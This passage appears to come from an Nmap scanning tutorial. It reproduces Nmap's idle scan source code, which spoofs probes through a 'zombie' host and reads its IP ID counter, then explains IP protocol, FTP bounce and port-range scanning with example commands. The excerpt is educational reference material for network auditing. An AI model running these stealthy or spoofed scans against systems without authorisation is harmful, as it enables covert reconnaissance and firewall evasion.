  struct timeval probe_send_times[NUM_IPID_PROBES], tmptv, rcvdtime;
  u16 lastipid = 0;
  struct ip *ip;
  struct tcp_hdr *tcp;
  int distance;
  int ipids[NUM_IPID_PROBES];
  u8 probe_returned[NUM_IPID_PROBES];
  struct route_nfo rnfo;

  assert(proxy);
  assert(proxyName);

  ack = get_random_u32();
  for (i = 0; i < NUM_IPID_PROBES; i++)
    probe_returned[i] = 0;

  initialize_proxy_struct(proxy);
  initialize_timeout_info(&proxy->host.to);

  proxy->max_groupsz = (o.max_parallelism) ? o.max_parallelism : 100;
  proxy->min_groupsz = (o.min_parallelism) ? o.min_parallelism : 4;
  proxy->max_senddelay = 100000;

  Strncpy(name, proxyName, sizeof(name));
  q = strchr(name, ':');
  if (q) {
    *q++ = '\0';
    proxy->probe_port = strtoul(q, &endptr, 10);
    if (*q == 0 || !endptr || *endptr != '\0' || !proxy->probe_port) {
      fatal("Invalid port number given in IP ID zombie specification: %s", proxyName);
    }
  } else {
    if (ports->syn_ping_count > 0) {
      proxy->probe_port = ports->syn_ping_ports[0];
    } else if (ports->ack_ping_count > 0) {
      proxy->probe_port = ports->ack_ping_ports[0];
    } else {
      u16 *ports;
      int count;
      getpts_simple(DEFAULT_TCP_PROBE_PORT_SPEC, SCAN_TCP_PORT, &ports, &count);
      assert(count > 0);
      proxy->probe_port = ports[0];
      free(ports);
    }
  }

  proxy->host.setHostName(name);
  if (resolve(name, 0, 0, &ss, &sslen, o.pf()) == 0) {
    fatal("Could not resolve idle scan zombie host: %s", name);
  }
  proxy->host.setTargetSockAddr(&ss, sslen);

  /* Lets figure out the appropriate source address to use when sending the
     pr0bez */
  proxy->host.TargetSockAddr(&ss, &sslen);
  if (!nmap_route_dst(&ss, &rnfo))
    fatal("Unable to find appropriate source address and device interface to use when sending packets to %s", proxyName);

  if (o.spoofsource) {
    o.SourceSockAddr(&ss, &sslen);
    proxy->host.setSourceSockAddr(&ss, sslen);
    proxy->host.setDeviceNames(o.device, o.device);
  } else {
    proxy->host.setDeviceNames(rnfo.ii.devname, rnfo.ii.devfullname);
    proxy->host.setSourceSockAddr(&rnfo.srcaddr, sizeof(rnfo.srcaddr));
  }
  if (rnfo.direct_connect) {
    proxy->host.setDirectlyConnected(true);
  } else {
    proxy->host.setDirectlyConnected(false);
    proxy->host.setNextHop(&rnfo.nexthop, sizeof(rnfo.nexthop));
  }
  proxy->host.setIfType(rnfo.ii.device_type);
  if (rnfo.ii.device_type == devt_ethernet)
    proxy->host.setSrcMACAddress(rnfo.ii.mac);

  /* Now lets send some probes to check IP ID algorithm ... */
  /* First we need a raw socket ... */
  if ((o.sendpref & PACKET_SEND_ETH) && proxy->host.ifType() == devt_ethernet) {
    if (!setTargetNextHopMAC(&proxy->host))
      fatal("%s: Failed to determine dst MAC address for Idle proxy", __func__);
    memcpy(proxy->eth.srcmac, proxy->host.SrcMACAddress(), 6);
    memcpy(proxy->eth.dstmac, proxy->host.NextHopMACAddress(), 6);
    proxy->eth.ethsd = eth_open_cached(proxy->host.deviceName());
    if (proxy->eth.ethsd == NULL)
      fatal("%s: Failed to open ethernet device (%s)", __func__, proxy->host.deviceName());
    proxy->rawsd = -1;
    proxy->ethptr = &proxy->eth;
  } else {
#ifdef WIN32
    win32_fatal_raw_sockets(proxy->host.deviceName());
#endif
    if ((proxy->rawsd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
      pfatal("socket troubles in %s", __func__);
    unblock_socket(proxy->rawsd);
    broadcast_socket(proxy->rawsd);
#ifndef WIN32
    sethdrinclude(proxy->rawsd);
#endif
    proxy->eth.ethsd = NULL;
    proxy->ethptr = NULL;
  }

  /* Now for the pcap opening nonsense ... */
  /* Note that the snaplen is 152 = 64 byte max IPhdr + 24 byte max link_layer
   * header + 64 byte max TCP header. */
  if ((proxy->pd = my_pcap_open_live(proxy->host.deviceName(), 152, (o.spoofsource) ? 1 : 0, 50)) == NULL)
    fatal("%s", PCAP_OPEN_ERRMSG);

  p = strdup(proxy->host.targetipstr());
  q = strdup(inet_ntoa(proxy->host.v4source()));
  Snprintf(filter, sizeof(filter), "tcp and src host %s and dst host %s and src port %hu", p, q, proxy->probe_port);
  free(p);
  free(q);
  set_pcap_filter(proxy->host.deviceFullName(), proxy->pd, filter);
  if (o.debugging)
    log_write(LOG_STDOUT, "Packet capture filter (device %s): %s\n", proxy->host.deviceFullName(), filter);

  /* Windows nonsense -- I am not sure why this is needed, but I should get rid
     of it at sometime */
  sequence_base = get_random_u32();

  /* Yahoo! It is finally time to send our pr0beZ! */
  while (probes_sent < NUM_IPID_PROBES) {
    if (o.scan_delay)
      enforce_scan_delay(NULL);
    else if (probes_sent)
      usleep(30000);

    /* TH_SYN|TH_ACK is what the proxy will really be receiving from the
       target, and is more likely to get through firewalls. But TH_SYN allows
       us to get a nonzero ACK back so we can associate a response with the
       exact request for timing purposes. So I think I'll use TH_SYN, although
       it is a tough call. */
    /* We can't use decoys 'cause that would screw up the IP IDs */
    send_tcp_raw(proxy->rawsd, proxy->ethptr,
                 proxy->host.v4sourceip(), proxy->host.v4hostip(),
                 o.ttl, false, o.ipoptions, o.ipoptionslen,
                 o.magic_port + probes_sent + 1, proxy->probe_port,
                 sequence_base + probes_sent + 1, ack, 0,
                 TH_SYN|TH_ACK, 0, 0, (u8 *) "\x02\x04\x05\xb4", 4, NULL, 0);
    gettimeofday(&probe_send_times[probes_sent], NULL);
    probes_sent++;

    /* Time to collect any replies */
    while (probes_returned < probes_sent && !timedout) {
      to_usec = (probes_sent == NUM_IPID_PROBES) ? hardtimeout : 1000;
      ip = (struct ip *) readipv4_pcap(proxy->pd, &bytes, to_usec, &rcvdtime, NULL, true);
      gettimeofday(&tmptv, NULL);
      if (!ip) {
        if (probes_sent < NUM_IPID_PROBES)
          break;
        if (TIMEVAL_SUBTRACT(tmptv, probe_send_times[probes_sent - 1]) >= hardtimeout) {
          timedout = 1;
        }
        continue;
      } else if (TIMEVAL_SUBTRACT(tmptv, probe_send_times[probes_sent - 1]) >= hardtimeout) {
        timedout = 1;
      }
      if (lastipid != 0 && ip->ip_id == lastipid) {
        continue; /* probably a duplicate */
      }
      lastipid = ip->ip_id;
      if (bytes < (4 * ip->ip_hl) + 14U)
        continue;
      if (ip->ip_p == IPPROTO_TCP) {
        tcp = ((struct tcp_hdr *) (((char *) ip) + 4 * ip->ip_hl));
        if (ntohs(tcp->th_dport) < (o.magic_port + 1) ||
            ntohs(tcp->th_dport) - o.magic_port > NUM_IPID_PROBES ||
            ntohs(tcp->th_sport) != proxy->probe_port ||
            ((tcp->th_flags & TH_RST) == 0)) {
          if (o.debugging > 1)
            error("Received unexpected response packet from %s during initial IP ID zombie testing", inet_ntoa(ip->ip_src));
          continue;
        }
        seq_response_num = probes_returned;
        /* The stuff below only works when we send SYN packets instead of
           SYN|ACK, but then are slightly less stealthy and have less chance of
           sneaking through the firewall. Plus SYN|ACK is what they will be
           receiving back from the target */
        probes_returned++;
        ipids[seq_response_num] = (u16) ntohs(ip->ip_id);
        probe_returned[seq_response_num] = 1;
        adjust_timeouts2(&probe_send_times[seq_response_num], &rcvdtime, &(proxy->host.to));
      }
    }
  }

  /* Yeah! We're done sending/receiving probes ... now lets ensure all of our
     responses are adjacent in the array */
  for (i = 0, probes_returned = 0; i < NUM_IPID_PROBES; i++) {
    if (probe_returned[i]) {
      if (i > probes_returned)
        ipids[probes_returned] = ipids[i];
      probes_returned++;
    }
  }

  if (probes_returned == 0)
    fatal("Idle scan zombie %s (%s) port %hu cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.",
          proxy->host.HostName(), proxy->host.targetipstr(), proxy->probe_port);

  proxy->seqclass = get_ipid_sequence(probes_returned, ipids, 0);
  switch (proxy->seqclass) {
  case IPID_SEQ_INCR:
  case IPID_SEQ_BROKEN_INCR:
    log_write(LOG_PLAIN, "Idle scan using zombie %s (%s:%hu); Class: %s\n",
              proxy->host.HostName(), proxy->host.targetipstr(), proxy->probe_port,
              ipidclass2ascii(proxy->seqclass));
    break;
  default:
    fatal("Idle scan zombie %s (%s) port %hu cannot be used because IP ID sequencability class is: %s. Try another proxy.",
          proxy->host.HostName(), proxy->host.targetipstr(), proxy->probe_port,
          ipidclass2ascii(proxy->seqclass));
  }

  proxy->latestid = ipids[probes_returned - 1];
  proxy->current_groupsz = MIN(proxy->max_groupsz, 30);

  if (probes_returned < NUM_IPID_PROBES) {
    /* Yikes! We're already losing packets ... clamp down a bit ... */
    if (o.debugging)
      error("Idle scan initial zombie qualification test: %d probes sent, only %d returned", NUM_IPID_PROBES, probes_returned);
    proxy->current_groupsz = MIN(12, proxy->max_groupsz);
    proxy->current_groupsz = MAX(proxy->current_groupsz, proxy->min_groupsz);
    proxy->senddelay += 5000;
  }

  /* OK, through experimentation I have found that some hosts (*cough* Solaris)
     APPEAR to use simple IP ID incrementing, but in reality they assign a new
     IP ID base to each host which connects with them. This is actually a good
     idea on several fronts, but it totally frustrates our efforts (which rely
     on side-channel IP ID info leaking to different hosts). The good news is
     that we can easily detect the problem by sending some spoofed packets
     "from" the first target to the zombie and then probing to verify that the
     proxy IP ID changed. This will also catch the case where the Nmap user is
     behind an egress filter or other measure that prevents this sort of
     sp00fery */
  if (first_target) {
    for (probes_sent = 0; probes_sent < 4; probes_sent++) {
      if (probes_sent)
        usleep(50000);
      send_tcp_raw(proxy->rawsd, proxy->ethptr,
                   first_target, proxy->host.v4hostip(),
                   o.ttl, false, o.ipoptions, o.ipoptionslen,
                   o.magic_port, proxy->probe_port,
                   sequence_base + probes_sent + 1, ack, 0,
                   TH_SYN|TH_ACK, 0, 0, (u8 *) "\x02\x04\x05\xb4", 4, NULL, 0);
    }
    /* Sleep a little while to give packets time to reach their destination */
    usleep(300000);
    newipid = ipid_proxy_probe(proxy, NULL, NULL);
    if (newipid == -1)
      newipid = ipid_proxy_probe(proxy, NULL, NULL); /* OK, we'll give it one more try */
    if (newipid < 0)
      fatal("Your IP ID Zombie (%s; %s) is behaving strangely -- suddenly cannot obtain IP ID",
            proxy->host.HostName(), proxy->host.targetipstr());

    distance = ipid_distance(proxy->seqclass, proxy->latestid, newipid);
    if (distance <= 0) {
      fatal("Your IP ID Zombie (%s; %s) is behaving strangely -- suddenly cannot obtain valid IP ID distance.",
            proxy->host.HostName(), proxy->host.targetipstr());
    } else if (distance == 1) {
      fatal("Even though your Zombie (%s; %s) appears to be vulnerable to IP ID sequence prediction (class: %s), our attempts have failed. This generally means that either the zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops them",
            proxy->host.HostName(), proxy->host.targetipstr(), ipidclass2ascii(proxy->seqclass));
    }
    if (o.debugging && distance != 5) {
      error("WARNING: IP ID spoofing test sent 4 packets and expected a distance of 5, but instead got %d", distance);
    }
    proxy->latestid = newipid;
  }
}

/* Adjust timing parameters up or down given that an idle scan found a count of
   'testcount' while the 'realcount' is as given. If the testcount was correct,
   timing is made more aggressive, while it is slowed down in the case of an
   error */
static void adjust_idle_timing(struct idle_proxy_info *proxy, Target *target,
                               int testcount, int realcount) {
  static int notidlewarning = 0;

  if (o.debugging > 1)
    log_write(LOG_STDOUT, "%s: tested/true %d/%d -- old grpsz/delay: %f/%d ",
              __func__, testcount, realcount, proxy->current_groupsz, proxy->senddelay);
  else if (o.debugging && testcount != realcount) {
    error("%s: testcount: %d realcount: %d -- old grpsz/delay: %f/%d",
          __func__, testcount, realcount, proxy->current_groupsz, proxy->senddelay);
  }

  if (testcount < realcount) {
    /* We must have missed a port -- our probe could have been dropped, the
       response to proxy could have been dropped, or we didn't wait long enough
       before probing the proxy IP ID. The third case is covered elsewhere in
       the scan, so we worry most about the first two. The solution is to
       decrease our group size and add a sending delay */
    /* packets could be dropped because too many were sent at once */
    proxy->current_groupsz = MAX(proxy->min_groupsz, proxy->current_groupsz * 0.8);
    proxy->senddelay += 10000;
    proxy->senddelay = MIN(proxy->max_senddelay, proxy->senddelay);
    /* No group size should be greater than .5s of send delays */
    proxy->current_groupsz = MAX(proxy->min_groupsz, MIN(proxy->current_groupsz, 500000 / (proxy->senddelay + 1)));
  } else if (testcount > realcount) {
    /* Perhaps the proxy host is not really idle ... */
    /* I guess all I can do is decrease the group size, so that if the proxy is
       not really idle, at least we may be able to scan chunks more quickly in
       between outside packets */
    proxy->current_groupsz = MAX(proxy->min_groupsz, proxy->current_groupsz * 0.8);
    if (!notidlewarning && o.verbose) {
      notidlewarning = 1;
      error("WARNING: idle scan has erroneously detected phantom ports -- is the proxy %s (%s) really idle?",
            proxy->host.HostName(), proxy->host.targetipstr());
    }
  } else {
    /* W00p We got a perfect match. That means we get a slight increase in
       allowed group size and we can lightly decrease the senddelay */
    proxy->senddelay = (int) (proxy->senddelay * 0.9);
    if (proxy->senddelay < 500)
      proxy->senddelay = 0;
    proxy->current_groupsz = MIN(proxy->current_groupsz * 1.1, 500000 / (proxy->senddelay + 1));
    proxy->current_groupsz = MIN(proxy->max_groupsz, proxy->current_groupsz);
  }
  if (o.debugging > 1)
    log_write(LOG_STDOUT, "-> %f/%d\n", proxy->current_groupsz, proxy->senddelay);
}

/* OK, now this is the hardcore idle scan function which actually does the
   testing (most of the other cruft in this file is just coordination,
   preparation, etc). This function simply uses the idle scan technique to try
   and count the number of open ports in the given port array. The sent_time
   and rcv_time are filled in with the times that the probe packet & response
   were sent/received. They can be NULL if you don't want to use them. The
   purpose is for timing adjustments if the numbers turn out to be accurate. */
static int idlescan_countopen2(struct idle_proxy_info *proxy, Target *target,
                               u16 *ports, int numports,
                               struct timeval *sent_time, struct timeval *rcv_time) {
#if 0 /* Testing code */
  int i;
  for (i = 0; i < numports; i++)
    if (ports[i] == 22)
      return 1;
  return 0;
#endif
  int openports;
  int tries;
  int proxyprobes_sent = 0; /* diff. from tries 'cause sometimes we skip tries */
  int proxyprobes_rcvd = 0; /* To determine if packets were dr0pped */
  int sent, rcvd;
  int ipid_dist;
  struct timeval start, end, latestchange, now;
  struct timeval probe_times[4];
  int pr0be;
  static u32 seq = 0;
  int newipid = 0;
  int sleeptime;
  int lasttry = 0;
  int dotry3 = 0;
  struct eth_nfo eth;

  if (seq == 0)
    seq = get_random_u32();

  memset(&end, 0, sizeof(end));
  memset(&latestchange, 0, sizeof(latestchange));
  gettimeofday(&start, NULL);
  if (sent_time)
    memset(sent_time, 0, sizeof(*sent_time));
  if (rcv_time)
    memset(rcv_time, 0, sizeof(*rcv_time));

  if (proxy->rawsd < 0) {
    if (!setTargetNextHopMAC(target))
      fatal("%s: Failed to determine dst MAC address for Idle proxy", __func__);
    memcpy(eth.srcmac, target->SrcMACAddress(), 6);
    memcpy(eth.dstmac, target->NextHopMACAddress(), 6);
    eth.ethsd = eth_open_cached(target->deviceName());
    if (eth.ethsd == NULL)
      fatal("%s: Failed to open ethernet device (%s)", __func__, target->deviceName());
  } else
    eth.ethsd = NULL;

  /* I start by sending out the SYN pr0bez */
  for (pr0be = 0; pr0be < numports; pr0be++) {
    if (o.scan_delay)
      enforce_scan_delay(NULL);
    else if (proxy->senddelay && pr0be > 0)
      usleep(proxy->senddelay);

    /* Maybe I should involve decoys in the picture at some point -- but doing
       it the straightforward way (using the same decoys as we use in probing
       the proxy box is risky. I'll have to think about this more. */
    send_tcp_raw(proxy->rawsd, eth.ethsd ? &eth : NULL,
                 proxy->host.v4hostip(), target->v4hostip(),
                 o.ttl, false, o.ipoptions, o.ipoptionslen,
                 proxy->probe_port, ports[pr0be], seq, 0, 0,
                 TH_SYN, 0, 0, (u8 *) "\x02\x04\x05\xb4", 4,
                 o.extra_payload, o.extra_payload_length);
  }
  gettimeofday(&end, NULL);

  openports = -1;
  tries = 0;
  TIMEVAL_MSEC_ADD(probe_times[0], start, MAX(50, (target->to.srtt * 3/4) / 1000));
  TIMEVAL_MSEC_ADD(probe_times[1], start, target->to.srtt / 1000);
  TIMEVAL_MSEC_ADD(probe_times[2], end, MAX(75, (2 * target->to.srtt + target->to.rttvar) / 1000));
  TIMEVAL_MSEC_ADD(probe_times[3], end, MIN(4000, (2 * target->to.srtt + (target->to.rttvar << 2)) / 1000));

  do {
    if (tries == 2)
      dotry3 = (get_random_u8() > 200);
    if (tries == 3 && !dotry3)
      break; /* We usually want to skip the long-wait test */
    if (tries == 3 || (tries == 2 && !dotry3))
      lasttry = 1;

    gettimeofday(&now, NULL);
    sleeptime = TIMEVAL_SUBTRACT(probe_times[tries], now);
    if (!lasttry && proxyprobes_sent > 0 && sleeptime < 50000)
      continue; /* No point going again so soon */

    if (tries == 0 && sleeptime < 500)
      sleeptime = 500;
    if (o.debugging > 1)
      error("In preparation for idle scan probe try #%d, sleeping for %d usecs", tries, sleeptime);
    if (sleeptime > 0)
      usleep(sleeptime);

    newipid = ipid_proxy_probe(proxy, &sent, &rcvd);
    proxyprobes_sent += sent;
    proxyprobes_rcvd += rcvd;

    if (newipid > 0) {
      ipid_dist = ipid_distance(proxy->seqclass, proxy->latestid, newipid);
      /* I used to only do this if ipid_dist >= proxyprobes_sent, but I'd
         rather have a negative number in that case. */
      if (ipid_dist < proxyprobes_sent) {
        if (o.debugging)
          error("%s: Must have lost a sent packet because ipid_dist is %d while proxyprobes_sent is %d.", __func__, ipid_dist, proxyprobes_sent);
        /* I no longer whack timing here ... done at bottom. */
      }
      ipid_dist -= proxyprobes_sent;
      if (ipid_dist > openports) {
        openports = ipid_dist;
        gettimeofday(&latestchange, NULL);
      } else if (ipid_dist < openports && ipid_dist >= 0) {
        /* Uh-oh. Perhaps I dropped a packet this time */
        if (o.debugging > 1) {
          error("%s: Counted %d open ports in try #%d, but counted %d earlier ... probably a proxy_probe problem", __func__, ipid_dist, tries, openports);
        }
        /* I no longer whack timing here ... done at bottom. */
      }
    }
    if (openports > numports || (numports <= 2 && (openports == numports)))
      break;
  } while (tries++ < 3);

  if (proxyprobes_sent > proxyprobes_rcvd) {
    /* Uh-oh. It looks like we lost at least one proxy probe packet */
    if (o.debugging) {
      error("%s: Sent %d probes; only %d responses. Slowing scan.", __func__, proxyprobes_sent, proxyprobes_rcvd);
    }
    proxy->senddelay += 5000;
    proxy->senddelay = MIN(proxy->max_senddelay, proxy->senddelay);
    /* No group size should be greater than .5s of send delays */
    proxy->current_groupsz = MAX(proxy->min_groupsz, MIN(proxy->current_groupsz, 500000 / (proxy->senddelay + 1)));
  } else {
    /* Yeah, we got as many responses as we sent probes. This calls for a very
       light timing acceleration ... */
    proxy->senddelay = (int) (proxy->senddelay * 0.95);
    if (proxy->senddelay < 500)
      proxy->senddelay = 0;
    proxy->current_groupsz = MAX(proxy->min_groupsz, MIN(proxy->current_groupsz, 500000 / (proxy->senddelay + 1)));
  }

  if ((openports > 0) && (openports <= numports)) {
    /* Yeah, we found open ports... lets adjust the timing ... */
    if (o.debugging > 2)
      error("%s: found %d open ports (out of %d) in %lu usecs", __func__, openports, numports, (unsigned long) TIMEVAL_SUBTRACT(latestchange, start));
    if (sent_time)
      *sent_time = start;
    if (rcv_time)
      *rcv_time = latestchange;
  }
  if (newipid > 0)
    proxy->latestid = newipid;
  if (eth.ethsd) {
    eth.ethsd = NULL; /* don't need to close it due to caching */
  }
  return openports;
}

/* The job of this function is to use the idle scan technique to count the
   number of open ports in the given list. Under the covers, this function just
   farms out the hard work to another function. */
static int idlescan_countopen(struct idle_proxy_info *proxy, Target *target,
                              u16 *ports, int numports,
                              struct timeval *sent_time, struct timeval *rcv_time) {
  int tries = 0;
  int openports;

  do {
    openports = idlescan_countopen2(proxy, target, ports, numports, sent_time, rcv_time);
    tries++;
    if (tries == 6 || (openports >= 0 && openports <= numports))
      break;

    if (o.debugging) {
      error("%s: In try #%d, counted %d open ports out of %d. Retrying", __func__, tries, openports, numports);
    }
    /* Sleep for a little while -- maybe proxy host had brief burst of traffic
       or similar problem */
    sleep(tries * tries);
    if (tries == 5)
      sleep(45); /* We're gonna give up if this fails, so we will be a bit patient */
    /* Since the host may have received packets while we were sleeping, lets
       update our proxy IP ID counter */
    proxy->latestid = ipid_proxy_probe(proxy, NULL, NULL);
  } while (1);

  if (openports < 0 || openports > numports) {
    /* Oh f*ck!!!! */
    fatal("Idle scan is unable to obtain meaningful results from proxy %s (%s). I'm sorry it didn't work out.",
          proxy->host.HostName(), proxy->host.targetipstr());
  }
  if (o.debugging > 2)
    error("%s: %d ports found open out of %d, starting with %hu", __func__, openports, numports, ports[0]);
  return openports;
}

/* Recursively idle scans a group of ports using a depth-first
   divide-and-conquer strategy to find the open one(s). */
static int idle_treescan(struct idle_proxy_info *proxy, Target *target,
                         u16 *ports, int numports, int expectedopen) {
  int firstHalfSz = (numports + 1) / 2;
  int secondHalfSz = numports - firstHalfSz;
  int flatcount1, flatcount2;
  int deepcount1 = -1, deepcount2 = -1;
  struct timeval sentTime1, rcvTime1, sentTime2, rcvTime2;
  int retrycount = -1, retry2 = -1;
  int totalfound = 0;

  /* Scan the first half of the range */
  if (o.debugging > 1) {
    error("%s: Called against %s with %d ports, starting with %hu. expectedopen: %d", __func__, target->targetipstr(), numports, ports[0], expectedopen);
    error("IDLE SCAN TIMING: grpsz: %.3f delay: %d srtt: %d rttvar: %d", proxy->current_groupsz, proxy->senddelay, target->to.srtt, target->to.rttvar);
  }
  flatcount1 = idlescan_countopen(proxy, target, ports, firstHalfSz, &sentTime1, &rcvTime1);

  if (firstHalfSz > 1 && flatcount1 > 0) {
    /* A port appears open! We dig down deeper to find it ... */
    deepcount1 = idle_treescan(proxy, target, ports, firstHalfSz, flatcount1);
    /* Now we assume deepcount1 is right, and adjust timing if flatcount1 was
       wrong. */
    adjust_idle_timing(proxy, target, flatcount1, deepcount1);
  }

  /* I guess we had better do the second half too ... */
  flatcount2 = idlescan_countopen(proxy, target, ports + firstHalfSz, secondHalfSz, &sentTime2, &rcvTime2);

  if ((secondHalfSz) > 1 && flatcount2 > 0) {
    /* A port appears open! We dig down deeper to find it ... */
    deepcount2 = idle_treescan(proxy, target, ports + firstHalfSz, secondHalfSz, flatcount2);
    /* Now we assume deepcount1 is right, and adjust timing if flatcount1 was
       wrong */
    adjust_idle_timing(proxy, target, flatcount2, deepcount2);
  }

  totalfound = (deepcount1 == -1) ? flatcount1 : deepcount1;
  totalfound += (deepcount2 == -1) ? flatcount2 : deepcount2;

  if ((flatcount1 + flatcount2 == totalfound) && (expectedopen == totalfound || expectedopen == -1)) {
    if (flatcount1 > 0) {
      if (o.debugging > 1) {
        error("Adjusting timing -- idlescan_countopen correctly found %d open ports (out of %d, starting with %hu)", flatcount1, firstHalfSz, ports[0]);
      }
      adjust_timeouts2(&sentTime1, &rcvTime1, &(target->to));
    }
    if (flatcount2 > 0) {
      if (o.debugging > 2) {
        error("Adjusting timing -- idlescan_countopen correctly found %d open ports (out of %d, starting with %hu)", flatcount2, secondHalfSz, ports[firstHalfSz]);
      }
      adjust_timeouts2(&sentTime2, &rcvTime2, &(target->to));
    }
  }

  if (totalfound != expectedopen) {
    if (deepcount1 == -1) {
      retrycount = idlescan_countopen(proxy, target, ports, firstHalfSz, NULL, NULL);
      if (retrycount != flatcount1) {
        /* We have to do a deep count if new ports were found and there are
           more than 1 total */
        if (firstHalfSz > 1 && retrycount > 0) {
          retry2 = retrycount;
          retrycount = idle_treescan(proxy, target, ports, firstHalfSz, retrycount);
          adjust_idle_timing(proxy, target, retry2, retrycount);
        } else {
          if (o.debugging)
            error("Adjusting timing because my first scan of %d ports, starting with %hu found %d open, while second scan yielded %d", firstHalfSz, ports[0], flatcount1, retrycount);
          adjust_idle_timing(proxy, target, flatcount1, retrycount);
        }
        totalfound += retrycount - flatcount1;
        flatcount1 = retrycount;
        /* If our first count erroneously found and added an open port, we must
           delete it */
        if (firstHalfSz == 1 && flatcount1 == 1 && retrycount == 0)
          target->ports.forgetPort(ports[0], IPPROTO_TCP);
      }
    }
    if (deepcount2 == -1) {
      retrycount = idlescan_countopen(proxy, target, ports + firstHalfSz, secondHalfSz, NULL, NULL);
      if (retrycount != flatcount2) {
        if (secondHalfSz > 1 && retrycount > 0) {
          retry2 = retrycount;
          retrycount = idle_treescan(proxy, target, ports + firstHalfSz, secondHalfSz, retrycount);
          adjust_idle_timing(proxy, target, retry2, retrycount);
        } else {
          if (o.debugging)
            error("Adjusting timing because my first scan of %d ports, starting with %hu found %d open, while second scan yielded %d", secondHalfSz, ports[firstHalfSz], flatcount2, retrycount);
          adjust_idle_timing(proxy, target, flatcount2, retrycount);
        }
        totalfound += retrycount - flatcount2;
        flatcount2 = retrycount;
        /* If our first count erroneously found and added an open port, we must
           delete it. */
        if (secondHalfSz == 1 && flatcount2 == 1 && retrycount == 0)
          target->ports.forgetPort(ports[firstHalfSz], IPPROTO_TCP);
      }
    }
  }

  if (firstHalfSz == 1 && flatcount1 == 1)
    target->ports.setPortState(ports[0], IPPROTO_TCP, PORT_OPEN);
  if ((secondHalfSz == 1) && flatcount2 == 1)
    target->ports.setPortState(ports[firstHalfSz], IPPROTO_TCP, PORT_OPEN);
  return totalfound;
}

/* The very top-level idle scan function -- scans the given target host using
   the given proxy -- the proxy is cached so that you can keep calling this
   function with different targets. */
void idle_scan(Target *target, u16 *portarray, int numports, char *proxyName,
               const struct scan_lists *ports) {
  static char lastproxy[MAXHOSTNAMELEN + 1] = ""; /* The proxy used in any previous call */
  static struct idle_proxy_info proxy;
  int groupsz;
  int portidx = 0; /* Used for splitting the port array into chunks */
  int portsleft;
  char scanname[128];
  Snprintf(scanname, sizeof(scanname), "idle scan against %s", target->NameIP());
  ScanProgressMeter SPM(scanname);

  if (numports == 0)
    return; /* nothing to scan for */
  if (!proxyName)
    fatal("idle scan requires a proxy host");

  if (*lastproxy && strcmp(proxyName, lastproxy))
    fatal("%s: You are not allowed to change proxies midstream. Sorry", __func__);
  assert(target);

  if (target->timedOut(NULL))
    return;

  if (target->ifType() == devt_loopback) {
    log_write(LOG_STDOUT, "Skipping Idle Scan against %s -- you can't idle scan your own machine (localhost).\n", target->NameIP());
    return;
  }
  target->startTimeOutClock(NULL);

  /* If this is the first call, */
  if (!*lastproxy) {
    initialize_idleproxy(&proxy, proxyName, target->v4hostip(), ports);
    strncpy(lastproxy, proxyName, sizeof(lastproxy));
  }

  /* If we don't have timing infoz for the new target, we'll use values derived
     from the proxy */
  if (target->to.srtt == -1 && target->to.rttvar == -1) {
    target->to.srtt = MAX(200000, 2 * proxy.host.to.srtt);
    target->to.rttvar = MAX(10000, MIN(proxy.host.to.rttvar, 2000000));
    target->to.timeout = target->to.srtt + (target->to.rttvar << 2);
  } else {
    target->to.srtt = MAX(target->to.srtt, proxy.host.to.srtt);
    target->to.rttvar = MAX(target->to.rttvar, proxy.host.to.rttvar);
    target->to.timeout = target->to.srtt + (target->to.rttvar << 2);
  }

  /* Now I guess it is time to let the scanning begin! Since idle scan is sort
     of tree structured (we scan a group and then divide it up and drill down
     in subscans of the group), we split the port space into smaller groups and
     then call a recursive divide-and-conquer function to find the open ports */
  while (portidx < numports) {
    portsleft = numports - portidx;
    /* current_groupsz is doubled below because idle_subscan cuts in half */
    groupsz = MIN(portsleft, (int) (proxy.current_groupsz * 2));
    idle_treescan(&proxy, target, portarray + portidx, groupsz, -1);
    portidx += groupsz;
  }

  char additional_info[14];
  Snprintf(additional_info, sizeof(additional_info), "%d ports", numports);
  SPM.endTask(NULL, additional_info);

  /* Now we go through the ports which were scanned but not determined to be
     open, and add them in the "closed|filtered" state */
  for (portidx = 0; portidx < numports; portidx++) {
    if (target->ports.portIsDefault(portarray[portidx], IPPROTO_TCP)) {
      target->ports.setPortState(portarray[portidx], IPPROTO_TCP, PORT_CLOSEDFILTERED);
      target->ports.setStateReason(portarray[portidx], IPPROTO_TCP, ER_NOIPIDCHANGE, 0, NULL);
    } else
      target->ports.setStateReason(portarray[portidx], IPPROTO_TCP, ER_IPIDCHANGE, 0, NULL);
  }
  target->stopTimeOutClock(NULL);
  return;
}

The listing above is Nmap's idle scan C++ source file; it is compiled as part of Nmap itself rather than built and run as a standalone program. OK, let's return to our remaining scan methods.

IP Protocol Scan
The IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines. This isn't technically a port scan, since it cycles through IP protocol numbers rather than TCP or UDP port numbers.
Command: nmap -sO target

FTP Bounce Scan
This abuses FTP's proxy feature, which allows a user to connect to one FTP server and then ask that files be sent to a third-party server.
Put simply, it asks the FTP server to send a file to each interesting port of a target host in turn; the resulting error message reveals whether the port is open or not. This is a good way to bypass firewalls, because organizational FTP servers are often placed where they have more access to other internal hosts than any old Internet host would. The option takes an argument of the form <username>:<password>@<server>:<port>, where <server> is the name or IP address of a vulnerable FTP server. Command: nmap -b <FTP relay host> <target>. This can also be used for a port bounce attack. nmap -T0 -b username:password@ftpserver.tld:21 victim.tld This uses the username “username”, the password “password”, the FTP server “ftpserver.tld” and port 21 on said server to scan victim.tld. If the FTP server supports anonymous logins, just leave out the username:password@ part and Nmap will assume anonymous login is allowed. You may omit :21 if the FTP port is 21; however, some people configure FTP on weird ports as an attempt at “security”. Port Specification and Scan Order In addition to all of the scan methods discussed previously, Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential. By default, Nmap scans the most common 1,000 ports for each protocol. -p <port ranges> (Only scan specified ports) This option specifies which ports you want to scan and overrides the default. Individual port numbers are OK, as are ranges separated by a hyphen (e.g. 1-1023). The beginning and/or end values of a range may be omitted, causing Nmap to use 1 and 65535, respectively. So you can specify -p- to scan ports from 1 through 65535. Scanning port zero is allowed if you specify it explicitly. nmap -p 1-1023 target When scanning a combination of protocols (e.g. TCP and UDP), you can specify a particular protocol by preceding the port numbers with T: for TCP, U: for UDP, S: for SCTP, or 